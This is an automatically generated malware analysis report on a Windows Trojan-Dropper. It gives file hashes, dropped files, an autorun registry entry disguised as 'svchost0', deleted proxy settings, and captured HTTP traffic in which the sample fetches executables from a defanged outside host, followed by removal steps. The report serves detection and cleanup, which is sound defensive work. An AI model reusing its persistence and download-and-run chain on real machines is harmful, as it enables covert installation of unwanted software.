Trojan.GenericKD.4597039_c59ec9aa29
Trojan-Dropper.Win32.Sysn.ceic (Kaspersky), Trojan.GenericKD.4597039 (B) (Emsisoft), Trojan.GenericKD.4597039 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: c59ec9aa2900d0444e445184b567cb8f
SHA1: daa38b395d3ffd0d24e47725773033d363e0e55e
SHA256: 61bec80b6be6183c4cfc4b06e047d68452ac775f9a103bb3d0d1d83aadaa4fa5
SSDeep: 12288:7XwOrReFWQF96hGcWn7GJeKYxh/DNlmWwnTKXVh2OAM1Vs6:7XwOrRsRMHWnSJ2xVCKVhomVH
Size: 471563 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: Heaventools Software
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup.exe:1900
uc.exe:1780
Bind.exe:2980
%original file name%.exe:1904
setup.tmp:2504
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp\setup.tmp (1423 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp\setup.tmp (0 bytes)
The process Bind.exe:2980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (322475 bytes)
The process %original file name%.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1234 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)
The process setup.tmp:2504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\is-EMLCE.tmp (23961 bytes)
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HV063.tmp (336232 bytes)
%Program Files%\fff\fff.ini (25 bytes)
%Program Files%\fff\uc.exe (20845 bytes)
%Program Files%\fff\is-27FEK.tmp (601 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp (0 bytes)
Registry activity
The process uc.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"
The process Bind.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process setup.tmp:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "52 57 97 14 28 CC 09 85 30 BF CB 12 66 D8 49 C0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\fff\uc.exe, %Program Files%\fff\Bind.exe"
"SessionHash" = "84 1E 35 B4 A2 6E D8 7B E4 2D FA 28 86 63 D2 BF"
"Owner" = "C8 09 00 00 4F 2D BE 0A 98 AA D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\RestartManager\Session0000]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
Dropped PE files
| MD5 | File path |
|---|---|
| 9ae609779122802b06182903baec93ea | c:\Program Files\fff\Bind.exe |
| c96a0f939b9e809d24d6149046b7eb72 | c:\Program Files\fff\uc.exe |
| f13f028e99888a77e21c721961101339 | c:\Program Files\fff\unins000.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 101854 | 101888 | 4.62608 | 0c04e49d78a3c453186c916e6f29540d |
| .rdata | 106496 | 15306 | 15360 | 3.96022 | 1eff757b36a6b7a599236ac8b1b35b4d |
| .data | 122880 | 19948 | 2560 | 3.08518 | 21d5c7a8ba54658b1e07909bf1045c79 |
| .rsrc | 143360 | 6124 | 6144 | 2.447 | 653c7269f74cc4a55256fa4ce18159c0 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 4
712fe060095354d46e56453a9e89361a
f7ee0c604322fd2ecde860d9e255e401
018dc6096ab70a223715be23a7529094
b74229149dee4708eeb55641b246cf2c
URLs
| URL | IP |
|---|---|
| hxxp://www.guoneizhu.com/ucni.txt | |
| hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe | |
| dns.msftncsi.com | |
| time.windows.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /Browser_V6.0.1471.913_r_4728_(Build1702151518).exe HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:15:23 GMT
Accept-Ranges: bytes
ETag: "6f2ddcf04c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Sat, 01 Apr 2017 03:28:34 GMT
Content-Length: 51179792
<<< skipped >>>
GET /ucni.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 31 Mar 2017 10:20:22 GMT
Accept-Ranges: bytes
ETag: "eb6c7678aad21:0"
Server: Microsoft-IIS/10.0
Date: Sat, 01 Apr 2017 03:28:12 GMT
Content-Length: 318
hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe
hXXp://VVV.guoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe
hXXp://VVV.guoneizhu.com/sogou_explorer_fast_7.0.6.23853_7471.exe sogou_explorer_fast_7.0.6.23853_7471.exe
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\%s
%s\*.*
@.reloc
GetProcessWindowStation
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
%Program Files%\fff\uc.exe
<assemblyIdentity version="9.4.3.2"
<requestedExecutionLevel
\aa.lnk
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
Chrome_WidgetWin_1
C:\Users\Public\Desktop\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
qqbrowser.exe
http\shell\open\command
%s\Internet Explorer\iexplore.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
mscoree.dll
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe
1, 0, 0, 1
uc.exe
Bind.exe_2980:
.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
HttpQueryInfoA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\fff\Bind.exe
Bind.exe
msctls_hotkey32
HotKey1
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup.exe:1900
uc.exe:1780
Bind.exe:2980
%original file name%.exe:1904
setup.tmp:2504
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-DC4UN.tmp\setup.tmp (1423 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (322475 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1234 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BOL6B.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\is-EMLCE.tmp (23961 bytes)
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HV063.tmp (336232 bytes)
%Program Files%\fff\fff.ini (25 bytes)
%Program Files%\fff\uc.exe (20845 bytes)
%Program Files%\fff\is-27FEK.tmp (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.